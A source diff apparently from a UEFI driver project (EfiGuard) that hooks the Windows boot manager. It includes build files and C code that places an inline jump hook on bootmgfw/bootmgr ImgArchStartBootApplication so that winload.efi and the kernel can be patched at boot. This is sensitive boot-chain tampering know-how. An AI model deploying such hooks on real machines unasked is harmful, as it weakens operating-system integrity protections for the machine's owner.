+// If Status is EFI_SUCCESS, the buffer holds concatenated patch information similar to what
+// is printed during the patching of bootmgfw.efi/bootmgr.efi/winload.efi.
+//
+typedef struct _KERNEL_PATCH_INFORMATION
+{
+ EFI_STATUS Status;
+ UINTN BufferSize; // In bytes, excluding null terminator. This may be 0. The maximum buffer size is simply sizeof(Buffer).
+ CHAR16 Buffer[8192]; // 8K ought to be enough for everyone
+ BOOLEAN LegacyLoaderBlock; // TRUE if the loader block provided by winload.efi will be for Vista or older kernels
+ VOID* KernelBase;
+} KERNEL_PATCH_INFORMATION;
+
+extern KERNEL_PATCH_INFORMATION gKernelPatchInfo;
+
+
+//
+// Appends a kernel patch status info or error message to the buffer for delayed printing,
+// and prints it to a boot debugger immediately if one is connected.
+//
+#define PRINT_KERNEL_PATCH_MSG(Fmt, ...) { \
+ gBlStatusPrint(Fmt, ##__VA_ARGS__); \
+ AppendKernelPatchMessage(Fmt, ##__VA_ARGS__); \
+ }
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/EfiGuardDxe/EfiGuardDxe.inf b/EfiGuardDxe/EfiGuardDxe.inf
new file mode 100644
index 0000000..ca63724
--- /dev/null
+++ b/EfiGuardDxe/EfiGuardDxe.inf
@@ -0,0 +1,85 @@
+[Defines]
+ INF_VERSION = 0x00010019
+ BASE_NAME = EfiGuardDxe
+ FILE_GUID = 503682AC-F01E-4D10-AAE3-BE5A90A563E7
+ MODULE_TYPE = DXE_RUNTIME_DRIVER
+ VERSION_STRING = 1.0
+
+ ENTRY_POINT = EfiGuardInitialize
+ UNLOAD_IMAGE = EfiGuardUnload
+
+[Sources]
+ EfiGuardDxe.c
+ PatchBootmgr.c
+ PatchNtoskrnl.c
+ PatchWinload.c
+ pe.c
+ util.c
+ Zydis/src/Decoder.c
+ Zydis/src/DecoderData.c
+ Zydis/src/MetaInfo.c
+ Zydis/src/Mnemonic.c
+ Zydis/src/Register.c
+ Zydis/src/SharedData.c
+ Zydis/src/String.c
+ Zydis/src/Utils.c
+ Zydis/src/Zydis.c
+
+[Packages]
+ MdePkg/MdePkg.dec
+ EfiGuardPkg/EfiGuardPkg.dec
+ MdeModulePkg/MdeModulePkg.dec
+ # In EDK2 releases older than UDK2017, gEfiShellProtocolGuid is not in MdePkg but in ShellPkg.
+ # ShellPkg/ShellPkg.dec
+
+[LibraryClasses]
+ UefiDriverEntryPoint
+ UefiBootServicesTableLib
+ UefiRuntimeServicesTableLib
+ DebugLib
+ UefiLib
+ BaseMemoryLib
+ DevicePathLib
+ SynchronizationLib
+ MemoryAllocationLib
+ PrintLib
+
+[Protocols]
+ gEfiGuardDriverProtocolGuid ## PRODUCES
+ gEfiDriverSupportedEfiVersionProtocolGuid ## PRODUCES
+ gEfiDevicePathToTextProtocolGuid ## CONSUMES
+ gEfiDevicePathUtilitiesProtocolGuid ## CONSUMES
+ gEfiLoadedImageProtocolGuid ## CONSUMES
+ gEfiShellProtocolGuid ## SOMETIMES_CONSUMES
+
+[Guids]
+ gEfiGlobalVariableGuid ## SOMETIMES_PRODUCES
+ gEfiEventExitBootServicesGuid ## CONSUMES
+ gEfiEventVirtualAddressChangeGuid ## CONSUMES
+ gEfiAcpi20TableGuid ## SOMETIMES_CONSUMES
+
+[Depex]
+ gEfiSimpleTextOutProtocolGuid AND
+ gEfiLoadedImageProtocolGuid AND
+ gEfiVariableArchProtocolGuid AND
+ gEfiVariableWriteArchProtocolGuid AND
+ gEfiResetArchProtocolGuid AND
+ gEfiBdsArchProtocolGuid AND
+ gEfiRuntimeArchProtocolGuid
+
+[BuildOptions.Common]
+ # Put Zydis on a diet
+ *_*_*_CC_FLAGS = -D ZYAN_UEFI -D ZYAN_NO_LIBC -D ZYCORE_STATIC_DEFINE -D ZYDIS_STATIC_DEFINE -D ZYDIS_DISABLE_AVX512 -D ZYDIS_DISABLE_KNC -D ZYDIS_DISABLE_FORMATTER
+
+ # This makes the decoder about twice as fast... sorry about the extra 5KB. Oh and usable PDBs please
+ MSFT:RELEASE_*_*_CC_FLAGS = /O2 /Ot /Zi
+ INTEL:RELEASE_*_*_CC_FLAGS = /O3 /Ot /Zi /Qopt-report-embed-
+
+ *:DEBUG_*_*_PP_FLAGS = -D EFI_DEBUG
+ *:DEBUG_*_*_CC_FLAGS = -D EFI_DEBUG
+
+ *:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG
+
+[BuildOptions.common.DXE_RUNTIME_DRIVER]
+ MSFT:*_*_*_DLINK_FLAGS = /SUBSYSTEM:EFI_RUNTIME_DRIVER,1.0
+ INTEL:*_*_*_DLINK_FLAGS = /SUBSYSTEM:EFI_RUNTIME_DRIVER,1.0
diff --git a/EfiGuardDxe/EfiGuardDxe.vcxproj b/EfiGuardDxe/EfiGuardDxe.vcxproj
new file mode 100644
index 0000000..3fa60fb
--- /dev/null
+++ b/EfiGuardDxe/EfiGuardDxe.vcxproj
@@ -0,0 +1,96 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup Label="ProjectConfigurations">
+ <ProjectConfiguration Include="Release|x64">
+ <Configuration>Release</Configuration>
+ <Platform>x64</Platform>
+ </ProjectConfiguration>
+ </ItemGroup>
+ <PropertyGroup Label="Globals">
+ <Keyword>Win32Proj</Keyword>
+ <ProjectGuid>{D7484EBA-6357-4D81-B355-066E28D5DF72}</ProjectGuid>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+ <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+ <ConfigurationType>Application</ConfigurationType>
+ <UseDebugLibraries>false</UseDebugLibraries>
+ <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset>
+ <WholeProgramOptimization>true</WholeProgramOptimization>
+ <CharacterSet>Unicode</CharacterSet>
+ </PropertyGroup>
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+ <Import Project="$(SolutionDir)\EfiGuard.props" />
+ <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+ <ItemDefinitionGroup>
+ <ClCompile>
+ <PreprocessorDefinitions>ZYAN_UEFI;ZYAN_NO_LIBC;ZYCORE_STATIC_DEFINE;ZYDIS_STATIC_DEFINE;ZYDIS_DISABLE_AVX512;ZYDIS_DISABLE_KNC;ZYDIS_DISABLE_FORMATTER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+ <AdditionalIncludeDirectories>$(SolutionDir)Include;Zydis/dependencies/zycore/include;Zydis/include;Zydis/src;Zydis/msvc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+ <Optimization>MaxSpeed</Optimization>
+ </ClCompile>
+ <Link>
+ <AdditionalDependencies>UefiDriverEntryPoint.lib;BaseMemoryLib.lib;%(AdditionalDependencies)</AdditionalDependencies>
+ <SubSystem>EFI Runtime</SubSystem>
+ <SectionAlignment>4096</SectionAlignment>
+ </Link>
+ </ItemDefinitionGroup>
+ <ItemGroup>
+ <ClCompile Include="EfiGuardDxe.c" />
+ <ClCompile Include="PatchBootmgr.c" />
+ <ClCompile Include="PatchNtoskrnl.c" />
+ <ClCompile Include="PatchWinload.c" />
+ <ClCompile Include="pe.c" />
+ <ClCompile Include="util.c" />
+ <ClCompile Include="VisualUefi.c" />
+ <ClCompile Include="Zydis\src\Decoder.c" />
+ <ClCompile Include="Zydis\src\DecoderData.c" />
+ <ClCompile Include="Zydis\src\Formatter.c" />
+ <ClCompile Include="Zydis\src\FormatterATT.c" />
+ <ClCompile Include="Zydis\src\FormatterBase.c" />
+ <ClCompile Include="Zydis\src\FormatterBuffer.c" />
+ <ClCompile Include="Zydis\src\FormatterIntel.c" />
+ <ClCompile Include="Zydis\src\MetaInfo.c" />
+ <ClCompile Include="Zydis\src\Mnemonic.c" />
+ <ClCompile Include="Zydis\src\Register.c" />
+ <ClCompile Include="Zydis\src\SharedData.c" />
+ <ClCompile Include="Zydis\src\String.c" />
+ <ClCompile Include="Zydis\src\Utils.c" />
+ <ClCompile Include="Zydis\src\Zydis.c" />
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="..\Include\Protocol\EfiGuard.h" />
+ <ClInclude Include="arc.h" />
+ <ClInclude Include="EfiGuardDxe.h" />
+ <ClInclude Include="ntdef.h" />
+ <ClInclude Include="pe.h" />
+ <ClInclude Include="util.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Allocator.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Bitset.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Comparison.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Defines.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Format.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\LibC.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Object.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Status.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\String.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Terminal.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Types.h" />
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Vector.h" />
+ <ClInclude Include="Zydis\include\Zydis\Decoder.h" />
+ <ClInclude Include="Zydis\include\Zydis\DecoderTypes.h" />
+ <ClInclude Include="Zydis\include\Zydis\Formatter.h" />
+ <ClInclude Include="Zydis\include\Zydis\MetaInfo.h" />
+ <ClInclude Include="Zydis\include\Zydis\Mnemonic.h" />
+ <ClInclude Include="Zydis\include\Zydis\Register.h" />
+ <ClInclude Include="Zydis\include\Zydis\SharedTypes.h" />
+ <ClInclude Include="Zydis\include\Zydis\ShortString.h" />
+ <ClInclude Include="Zydis\include\Zydis\Status.h" />
+ <ClInclude Include="Zydis\include\Zydis\Utils.h" />
+ <ClInclude Include="Zydis\include\Zydis\Zydis.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\DecoderData.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterATT.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterBase.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterIntel.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\SharedData.h" />
+ <ClInclude Include="Zydis\include\Zydis\Internal\String.h" />
+ </ItemGroup>
+</Project> \ No newline at end of file
diff --git a/EfiGuardDxe/EfiGuardDxe.vcxproj.filters b/EfiGuardDxe/EfiGuardDxe.vcxproj.filters
new file mode 100644
index 0000000..9d4164d
--- /dev/null
+++ b/EfiGuardDxe/EfiGuardDxe.vcxproj.filters
@@ -0,0 +1,200 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <ItemGroup>
+ <Filter Include="Source Files">
+ <UniqueIdentifier>{2C3B8C5F-45D8-45DC-89D3-F9FB7889C9DA}</UniqueIdentifier>
+ <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+ </Filter>
+ <Filter Include="Header Files">
+ <UniqueIdentifier>{548AA1C9-5601-4F15-B01D-53DC20744039}</UniqueIdentifier>
+ <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+ </Filter>
+ <Filter Include="Source Files\Zydis">
+ <UniqueIdentifier>{E64B1967-A437-4420-AC18-B9D6B9B1ADF2}</UniqueIdentifier>
+ </Filter>
+ <Filter Include="Header Files\Zydis">
+ <UniqueIdentifier>{145DB519-2372-49B9-909D-3F2A5D213772}</UniqueIdentifier>
+ </Filter>
+ <Filter Include="Header Files\Zydis\Zycore">
+ <UniqueIdentifier>{8E598E8D-FF52-43E7-9FA7-F9CDE9D3F771}</UniqueIdentifier>
+ </Filter>
+ <Filter Include="Header Files\Zydis\Internal">
+ <UniqueIdentifier>{09843B9B-51DC-4418-9585-2ED4BD3F1643}</UniqueIdentifier>
+ </Filter>
+ <Filter Include="Header Files\Protocol">
+ <UniqueIdentifier>{aa6da080-fea5-447e-8722-35a98038eb4e}</UniqueIdentifier>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="EfiGuardDxe.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="pe.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="util.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="PatchBootmgr.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="PatchWinload.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="PatchNtoskrnl.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Decoder.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\DecoderData.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Formatter.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\FormatterATT.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\FormatterBase.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\FormatterBuffer.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\FormatterIntel.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\MetaInfo.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Mnemonic.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Register.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\SharedData.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\String.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Utils.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="Zydis\src\Zydis.c">
+ <Filter>Source Files\Zydis</Filter>
+ </ClCompile>
+ <ClCompile Include="VisualUefi.c">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="EfiGuardDxe.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="pe.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="arc.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="util.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Allocator.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Bitset.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Comparison.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Defines.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Format.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\LibC.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Object.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Status.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\String.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Terminal.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Types.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Vector.h">
+ <Filter>Header Files\Zydis\Zycore</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Decoder.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\DecoderTypes.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Formatter.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\MetaInfo.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Mnemonic.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Register.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\SharedTypes.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\ShortString.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Status.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Utils.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Zydis.h">
+ <Filter>Header Files\Zydis</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\DecoderData.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterATT.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterBase.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\FormatterIntel.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\SharedData.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="Zydis\include\Zydis\Internal\String.h">
+ <Filter>Header Files\Zydis\Internal</Filter>
+ </ClInclude>
+ <ClInclude Include="..\Include\Protocol\EfiGuard.h">
+ <Filter>Header Files\Protocol</Filter>
+ </ClInclude>
+ <ClInclude Include="ntdef.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ </ItemGroup>
+</Project> \ No newline at end of file
diff --git a/EfiGuardDxe/PatchBootmgr.c b/EfiGuardDxe/PatchBootmgr.c
new file mode 100644
index 0000000..aa27135
--- /dev/null
+++ b/EfiGuardDxe/PatchBootmgr.c
@@ -0,0 +1,372 @@
+#include "EfiGuardDxe.h"
+
+#include <Library/BaseMemoryLib.h>
+
+VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgfwImgArchStartBootApplication = NULL;
+UINT8 gBootmgfwImgArchStartBootApplicationBackup[sizeof(gHookTemplate)] = { 0 };
+
+VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgrImgArchStartBootApplication = NULL;
+UINT8 gBootmgrImgArchStartBootApplicationBackup[sizeof(gHookTemplate)] = { 0 };
+
+
+//
+// Universal template bytes for a "faux call" inline hook
+//
+CONST UINT8 gHookTemplate[] =
+{
+#if defined(MDE_CPU_X64)
+ 0x48, 0xB8, // mov rax,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // <addr>
+#elif defined(MDE_CPU_IA32)
+ 0xB8, // mov eax,
+ 0x00, 0x00, 0x00, 0x00, // <addr>
+#endif
+ 0x50, // push [e|r]ax
+ 0xC3 // ret
+};
+
+
+// Signature for [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication
+STATIC CONST UINT8 SigImgArchStartBootApplication[] = {
+ 0x41, 0xB8, 0x09, 0x00, 0x00, 0xD0 // mov r8d, 0D0000009h
+};
+
+
+//
+// Shared function called by [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication hooks to patch either winload.efi or bootmgr.efi
+//
+STATIC
+EFI_STATUS
+EFIAPI
+HookedBootManagerImgArchStartBootApplication(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ IN UINT32 BootOption,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments,
+ IN VOID* /*t_ImgArchStartBootApplication_XX*/ OriginalFunction,
+ IN CONST UINT8* OriginalFunctionBytes
+ )
+{
+ // Restore the original function bytes that we replaced with our hook
+ CopyMem(OriginalFunction, OriginalFunctionBytes, sizeof(gHookTemplate));
+
+ // Clear the screen and paint it, paint it bl... green
+ CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, TRUE);
+
+ // Get the PE headers
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize);
+ INPUT_FILETYPE FileType = Unknown;
+ if (NtHeaders == NULL)
+ {
+ Print(L"\r\nHookedBootmanagerImgArchStartBootApplication: PE image at 0x%p with size 0x%lx is invalid!\r\nPress any key to continue anyway, or press ESC to reboot.\r\n",
+ ImageBase, ImageSize);
+ if (!WaitForKey())
+ {
+ gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL);
+ }
+ goto CallOriginal;
+ }
+
+ // Determine if we're starting winload.efi, bootmgr.efi (when booting a WIM), or something else
+ FileType = GetInputFileType((UINT8*)ImageBase, (UINTN)ImageSize);
+ if (FileType != WinloadEfi && FileType != BootmgrEfi)
+ {
+ // Nothing for us to do
+ DEBUG((DEBUG_INFO, "HookedBootmanagerImgArchStartBootApplication: booting application of type %S; not winload.efi or bootmgr.efi. No further patches will be applied.\r\n",
+ FileTypeToString(FileType)));
+ goto CallOriginal;
+ }
+
+ // Print info
+ Print(L"[ %S!ImgArchStartBootApplication ]\r\n", (OriginalFunctionBytes == gBootmgrImgArchStartBootApplicationBackup ? L"bootmgr" : L"bootmgfw"));
+ Print(L"ImageBase: 0x%p\r\n", ImageBase);
+ Print(L"ImageSize: %lx\r\n", ImageSize);
+ Print(L"File type: %S\r\n", FileTypeToString(FileType));
+ Print(L"EntryPoint: 0x%p\r\n", ((UINT8*)ImageBase + HEADER_FIELD(NtHeaders, AddressOfEntryPoint)));
+ Print(L"AppEntry:\r\n");
+ Print(L" Signature: %a\r\n", AppEntry->Signature);
+ Print(L" Flags: %lx\r\n", AppEntry->Flags);
+ Print(L" GUID: %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\r\n",
+ AppEntry->Guid.Data1, AppEntry->Guid.Data2, AppEntry->Guid.Data3,
+ AppEntry->Guid.Data4[0], AppEntry->Guid.Data4[1], AppEntry->Guid.Data4[2], AppEntry->Guid.Data4[3],
+ AppEntry->Guid.Data4[4], AppEntry->Guid.Data4[5], AppEntry->Guid.Data4[6], AppEntry->Guid.Data4[7]);
+#ifdef EFI_DEBUG
+ // Stuff likely no one cares about
+ Print(L" Unknown: %lx %lx %lx %lx\r\n", AppEntry->Unknown[0], AppEntry->Unknown[1], AppEntry->Unknown[2], AppEntry->Unknown[3]);
+ Print(L" BcdData:\r\n");
+ Print(L" Type: %lx\r\n", AppEntry->BcdData.Type);
+ Print(L" DataOffset: %lx\r\n", AppEntry->BcdData.DataOffset);
+ Print(L" DataSize: %lx\r\n", AppEntry->BcdData.DataSize);
+ Print(L" ListOffset: %lx\r\n", AppEntry->BcdData.ListOffset);
+ Print(L" NextEntryOffset: %lx\r\n", AppEntry->BcdData.NextEntryOffset);
+ Print(L" Empty: %lx\r\n", AppEntry->BcdData.Empty);
+#endif
+
+ if (FileType == WinloadEfi)
+ {
+ // Patch winload.efi
+ PatchWinload(ImageBase,
+ NtHeaders);
+ }
+ else if (FileType == BootmgrEfi)
+ {
+ // Call PatchBootManager a second time; this time to patch bootmgr.efi
+ PatchBootManager(FileType,
+ ImageBase,
+ ImageSize);
+ }
+
+CallOriginal:
+ if (FileType == WinloadEfi || FileType == BootmgrEfi)
+ {
+ // Clear screen
+ gST->ConOut->EnableCursor(gST->ConOut, FALSE);
+ SetConsoleTextColour((UINTN)((OriginalAttribute >> 4) & 0x7), TRUE);
+ }
+
+ // Call the original function to transfer execution to the boot application entry point; normally winload.efi!OslMain or bootmgr.efi!BmMain.
+ // If FileType != WinloadEfi && FileType != BootmgrEfi, no further patches will be applied because this is some other application being started.
+ CONST BOOLEAN VistaOrSevenBootManager = BootOption == MAX_UINT32;
+ return VistaOrSevenBootManager
+ ? ((t_ImgArchStartBootApplication_Vista)OriginalFunction)(AppEntry, ImageBase, ImageSize, ReturnArguments)
+ : ((t_ImgArchStartBootApplication_Eight)OriginalFunction)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArguments);
+}
+
+//
+// bootmgfw!ImgArchEfiStartBootApplication hook to patch either winload.efi or bootmgr.efi, Windows Vista/7 version.
+// This has to be a separate function from the bootmgr hook because their backup and return addresses will differ
+//
+STATIC
+EFI_STATUS
+EFIAPI
+HookedBootmgfwImgArchEfiStartBootApplication_Vista(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ )
+{
+ return HookedBootManagerImgArchStartBootApplication(AppEntry,
+ ImageBase,
+ ImageSize,
+ MAX_UINT32,
+ ReturnArguments,
+ gOriginalBootmgfwImgArchStartBootApplication,
+ gBootmgfwImgArchStartBootApplicationBackup);
+}
+
+//
+// bootmgfw!ImgArch[Efi]StartBootApplication hook to patch either winload.efi or bootmgr.efi, Windows >= 8 version.
+// This has to be a separate function from the bootmgr hook because their backup and return addresses will differ
+//
+STATIC
+EFI_STATUS
+EFIAPI
+HookedBootmgfwImgArchStartBootApplication_Eight(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ IN UINT32 BootOption,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ )
+{
+ return HookedBootManagerImgArchStartBootApplication(AppEntry,
+ ImageBase,
+ ImageSize,
+ BootOption,
+ ReturnArguments,
+ gOriginalBootmgfwImgArchStartBootApplication,
+ gBootmgfwImgArchStartBootApplicationBackup);
+}
+
+//
+// bootmgr!ImgArchEfiStartBootApplication hook to patch winload.efi, Windows Vista/7 version.
+// This has to be a separate function from the bootmgfw hook because their backup and return addresses will differ
+//
+STATIC
+EFI_STATUS
+EFIAPI
+HookedBootmgrImgArchEfiStartBootApplication_Vista(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ )
+{
+ return HookedBootManagerImgArchStartBootApplication(AppEntry,
+ ImageBase,
+ ImageSize,
+ MAX_UINT32,
+ ReturnArguments,
+ gOriginalBootmgrImgArchStartBootApplication,
+ gBootmgrImgArchStartBootApplicationBackup);
+}
+
+//
+// bootmgr!ImgArch[Efi]StartBootApplication hook to patch winload.efi, Windows >= 8 version.
+// This has to be a separate function from the bootmgfw hook because their backup and return addresses will differ
+//
+STATIC
+EFI_STATUS
+EFIAPI
+HookedBootmgrImgArchStartBootApplication_Eight(
+ IN PBL_APPLICATION_ENTRY AppEntry,
+ IN VOID* ImageBase,
+ IN UINT32 ImageSize,
+ IN UINT32 BootOption,
+ OUT PBL_RETURN_ARGUMENTS ReturnArguments
+ )
+{
+ return HookedBootManagerImgArchStartBootApplication(AppEntry,
+ ImageBase,
+ ImageSize,
+ BootOption,
+ ReturnArguments,
+ gOriginalBootmgrImgArchStartBootApplication,
+ gBootmgrImgArchStartBootApplicationBackup);
+}
+
+//
+// Patches the Windows Boot Manager (either bootmgfw.efi or bootmgr.efi; normally the former unless booting a WIM file)
+//
+EFI_STATUS
+EFIAPI
+PatchBootManager(
+ IN INPUT_FILETYPE FileType,
+ IN VOID* ImageBase,
+ IN UINTN ImageSize
+ )
+{
+ if (gBootmgfwHandle == NULL)
+ return EFI_NOT_STARTED;
+
+ ASSERT(FileType == BootmgfwEfi || FileType == BootmgrEfi);
+
+ // Get PE headers
+ CONST BOOLEAN PatchingBootmgrEfi = FileType == BootmgrEfi;
+ CONST CHAR16* ShortFileName = PatchingBootmgrEfi ? L"bootmgr" : L"bootmgfw";
+ CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize);
+ EFI_STATUS Status;
+ if (NtHeaders == NULL)
+ {
+ Status = EFI_LOAD_ERROR;
+ Print(L"\r\nPatchBootManager: %S.efi PE image at 0x%p with size 0x%llx is invalid!\r\nPress any key to continue anyway, or press ESC to reboot.\r\n",
+ ShortFileName, ImageBase, ImageSize);
